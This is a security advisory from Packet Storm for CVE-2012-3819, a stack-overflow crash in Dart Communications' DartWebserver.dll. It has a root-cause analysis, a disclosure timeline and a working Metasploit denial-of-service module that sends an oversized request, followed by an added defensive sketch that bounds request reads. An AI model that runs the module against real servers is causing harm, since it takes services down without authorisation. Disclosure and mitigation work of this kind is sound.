Dart Communications Stack Overflow

2012-10-02T00:00:00
ID PACKETSTORM:117060
Type packetstorm
Reporter catatonicprime
Modified 2012-10-02T00:00:00

Description

                                        
`Overview  
===============  
DartWebserver.Dll is an HTTP server provided by Dart Communications  
(dart.com). It is distributed in their PowerTCP/Webserver For ActiveX  
product and likely other similar products.  
  
"Build web applications in any familiar software development  
environment. Use WebServer for ActiveX to add web-based access to  
traditional compiled applications."  
  
Version 1.9 and prior is vulnerable to a stack overflow exception,  
which may be triggered by sending a large request to the application,  
e.g. "a" * 5200000 + "\n\n"  
  
Analysis  
===============  
During the processing of incoming HTTP requests the server collects  
data until it encounters a "\n\n" sentinel. If the request is large,  
multiple copies are made and stored on the stack. This quickly consumes  
the stack space available to the process and leads to a stack overflow  
exception being thrown. This exception is not handled and will  
typically lead to the termination of the parent process. Behavior may  
vary per system depending on pre-existing memory conditions, and the  
Proof of Concept (PoC) code may need modification to reproduce the  
exception.  
  
Timeline  
===============  
10/20/2011 - Discovered the bug in an affected vendor application  
10/20/2011 - Contacted affected vendor  
10/21/2011 - Affected vendor replies stating they cannot get the  
product vendor to create a fix  
06/29/2012 - CVE assignment  
08/08/2012 - Contacted product vendor providing specifics  
08/20/2012 - Product vendor created an issue number (#5654) for the  
bug, but replied "there are not immediate plans to resolve the issue"  
09/28/2012 - Posting to bugtraq, for the first time ever ;-)  
  
PoC (MSF Module)  
===============  
require 'msf/core'  
  
class Metasploit3 < Msf::Auxiliary  
  include Msf::Exploit::Remote::Tcp  
  include Msf::Auxiliary::Dos  
  
  def initialize(info = {})  
    super(update_info(info,  
      'Name'           => 'Dart Webserver <= 1.9.0 Stack Overflow',  
      'Description'    => %q{  
        Dart Webserver from Dart Communications throws a stack overflow exception  
        when processing large requests.  
      },  
      'Author'         => [  
        'catatonicprime'  
      ],  
      'Version'        => '$Revision: 15513 $',  
      'License'        => MSF_LICENSE,  
      'References'     => [  
        [ 'CVE', '2012-3819' ],  
      ],  
      'DisclosureDate' => '9/28/2012'))  
  
    register_options([  
      Opt::RPORT(80),  
      OptInt.new('SIZE', [ true, 'Estimated stack size to exhaust', '520000' ])  
    ])  
  end  
  
  def run  
    # Host string (with port when not 80); not used by the request below  
    serverIP = datastore['RHOST']  
    if (datastore['RPORT'].to_i != 80)  
      serverIP += ":" + datastore['RPORT'].to_s  
    end  
    size = datastore['SIZE']  
  
    print_status("Crashing the server ...")  
    # One oversized line followed by the end-of-headers sentinel  
    request = "A" * size + "\r\n\r\n"  
    connect  
    sock.put(request)  
    disconnect  
  end  
end  
`
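
The Analysis section attributes the crash to request data being collected without a bound until the sentinel arrives. The following is an added example, not code from the advisory or from Dart's product: a Ruby sketch of the bounded read a front-end placed before an unpatched server could apply. The 16 KiB cap, the 431/400 answers and all names are assumptions chosen for illustration.

```ruby
require 'stringio'

# Assumed limits for this illustration; they are not values from Dart's product.
MAX_HEAD_BYTES = 16 * 1024
CHUNK_BYTES    = 4096
TERMINATORS    = ["\r\n\r\n", "\n\n"].freeze   # end-of-headers sentinels

class RequestHeadTooLarge   < StandardError; end
class RequestHeadIncomplete < StandardError; end

# Reads from io until an end-of-headers sentinel, holding at most `limit` bytes
# in one heap buffer. Returns [head, leftover]; leftover is any body data that
# arrived in the same read as the sentinel.
def read_request_head(io, limit: MAX_HEAD_BYTES, chunk: CHUNK_BYTES)
  buf = String.new(encoding: Encoding::BINARY)
  loop do
    scan_from = [buf.bytesize - 3, 0].max   # a sentinel can straddle two reads
    begin
      buf << io.readpartial([chunk, limit - buf.bytesize].min).b
    rescue EOFError
      raise RequestHeadIncomplete, "peer closed after #{buf.bytesize} bytes"
    end
    ends = TERMINATORS.map { |t| (i = buf.index(t, scan_from)) && i + t.bytesize }
    cut  = ends.compact.min
    return [buf.byteslice(0, cut), buf.byteslice(cut, buf.bytesize)] if cut
    raise RequestHeadTooLarge, "no sentinel within #{limit} bytes" if buf.bytesize >= limit
  end
end

# Decision a front-end would take before anything reaches the protected server.
def screen_request(io, **limits)
  head, _leftover = read_request_head(io, **limits)
  [:forward, head.bytesize]
rescue RequestHeadTooLarge
  [431, nil]   # Request Header Fields Too Large: answer and close, never forward
rescue RequestHeadIncomplete
  [400, nil]
end

if $PROGRAM_NAME == __FILE__
  # Constructed sample inputs
  ok  = "GET / HTTP/1.1\r\nHost: example.test\r\n\r\n"
  big = "A" * 520_000 + "\r\n\r\n"   # same shape as the request built in the PoC
  p screen_request(StringIO.new(ok))
  p screen_request(StringIO.new(big))
end
```

The reader stops after `limit` bytes regardless of how much the peer sends, so memory use is bounded by the cap rather than by the request.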